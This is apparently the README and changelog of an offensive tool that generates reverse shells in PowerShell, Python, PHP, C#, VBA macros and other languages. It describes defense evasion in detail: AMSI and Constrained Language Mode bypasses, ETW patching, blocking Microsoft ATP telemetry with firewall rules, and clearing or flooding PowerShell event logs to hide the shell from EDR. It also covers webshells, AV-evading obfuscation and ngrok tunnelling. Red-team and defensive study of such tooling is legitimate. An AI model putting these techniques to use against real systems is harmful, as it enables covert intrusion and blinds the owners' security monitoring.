A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formatted.
- Shows username@computer.(domain), above the prompt and working-directory
- Has a partial and full AMSI-bypass.
- TCP, UDP and SSL shells
- New custom TCP revshell!
- New custom SSL revshell!
- Reflective loading theart42's amazing Sharpcat!
- Windows Powershell and Core Powershell
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- No PowerShell? No problem! Load embedded Python. Signed files and trusted by Microsoft Intelligent Security Graph.
- ngrok can be started/stopped from inside the script
- payloads will be genereated with the ngrok addresses
- you can start/stop Updog from inside the script
- The PowerShell revshells have upload/download function embedded
- To upload from nix using curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
pacman -S shellz
netcat, rlwrap, jq, basenc (coreutils)
updog, ngrok, xclip
- Added Windows Terminal Init option in the PowerShell section
- Added option under Python, for using Python Embedded in a VBA Macro
- Added option under PowerShell for staged loading of a Constrained Language Mode bypass using msbuild.exe
- Changed payload for Python Embedded. Not saving script to disk anymore
- Obfuscated the Python revshell some
- Fixed typo in Python3 payload for Windows
- Added option for using Python Embedded to get a revshell on a Windows box not having Python installed and without using PowerShell.
- Added PS to prompt in SSL shell
- Shortened the full amsi bypass
- Removed "updog is not running" message when it first hasn't been activated
- Removed some more auto-enter selections in menus
- Fixed error in block MDE command
- Added init command options: cmd, conhost, powershell (If the payload is over 8191 characters, it has to be initiated from powershell directly)
- Filling "Microsoft-Windows-PowerShell/Operational" with even more entries, to be sure to push out the script initial execution. (Only works if scriptblock logging is enabled on target)
- Had only URL-safe Base64 encoding. Added ordinary base64 encodig of payloads.
- Added option for filling powershell-log. It will start a bunch of powershell sessions, passing a long string and exit. This will fill the log, when scriptblock logging is enabled, effectively pushing out earlier log entries and thus removing the event of the shell itself spawning. Could prevent EDR detection. Tested with success on SentinelOne.
- Fixed confusing menu selections. Removed auto-enter on selecting options on most menus.
- Added Metasploit Multi/handler Listener
- Added Powershell ETW-patch
- Added Powershell embedded full AMSI-bypass.
- Added payload length check. The maximum length of the string that you can use at the Windows command prompt (cmd.exe) is 8191 character.
- Fixed Powershell SSL-shell
- Added variable expansion on the powershell payload, making it run from e.g. batch-files without modifying it
- Renaming to Shellz
- Listener started in new window. (Optional on Linux)
- Powershell: Added option for reflective loading Sharpcat
- PowerShell: New custom SSL shell
- PowerShell: Added options for choosing TCP/UDP/SSL
- PowerShell/OpenSSL: Defaulting to correct listener when using SSL
- Updated installer to use wrapper-script (remember to delete /usr/local/bin/shells when upgrading from < 1.5.8)
- PowerShell: Buildt a unique TCP revshell, that is not using Net.Sockets.TCPClient
- PowerShell: Remote errormessages now being properly displayed
- PHP: added options and more payloads
- Added option on other payloads for changing shell
- Powershell: Fixed the NIX payload
- Powershell: Updated the payload for reflective loading C#
- Powershell: Added options for payload in menu.
- PowerShell: Changed revshell for bypassing more AV vendors
- Powershell: Added firewall-rule, preventing MS ATP from phoning home (if the running user has access)
- Powershell: Updated VBA (MS Office Macros)
- PowerShell: Disabling scriptblock logging and CheckSuspiciousContent
- PowerShell: Clears PowerShell eventlogs (if the running user has access)
- PowerShell: Added VBA payloads for MS Office Macros
- Added some node.js payloads
- Added a simple C# shell.
- Added payload for reflective loading the C# shell into memory. (Needs full AMSI bypass)
- Covering this by adding Rastamouse's full AMSI Bypass
- PowerShell: You can automatically upload and run full AMSI bypass. The partitial AMSI bypass makes this possible.
- C# Shell: Automatically upload and run full AMSI bypass before loading it into memory
- Updog and ngrok status showing in every menu
- Sometimes less is more. Removed the obfuscating on TCP/UDP PowerShell revshells, because it actually triggers AV more than it bypasses and the payload got really big :-) Still using randomization.
- Added webshells (ASPX, PHP, JSP)
- Added 2 c++ revshell binaries for Windows 32 and 64 bit.
- Fixed the handling of starting/stopping Updog
- Added Updog support
- Added Netcat binaries.
- Powershell: Created upload/download functionality (upload requires Updog for receiving files)
- Added more information about running ngrok and Updog.
- PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
- PowerShell: Added a "upload" function in the Powershell reverseshell
- Removed AMSI. Not tested enough :-)
- Added AMSI-bypass for the powershell payloads
- Fixed bug when setting port
- Changed default port to 443
- PowerShell: obfuscated some more
- PowerShell: Minor changes to the UDP payload
- Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
- PowerShell: Added UDP payloads
- PowerShell: Added more payloads
- PowerShell: Added some randomization and obfuscation for the payload
- PowerShell: Using UTF8 encoding in payload
- Added Golang
- Added OpenSSL
- Fixed bug in Python revshell
- Added awk
- Added Bash UDP
- Added Windows Python revshells
- Added a ngrok running-status
- Hiding ngrok choice if not installed
- Fixed the install options: not doing default option when pressing enter without making a choice
- Added support for ngrok.
- Added a install-script
- Added install options for checking and installing missing dependencies
- Added a couple of PHP shells
- Added shells for: Ruby, Perl, Telnet and zsh
- Added copy to clipboard using pbcopy on macOS
- Added info about listening netcat as the macOS versions doesn't display that
- Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
- Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS
- Added support for macOS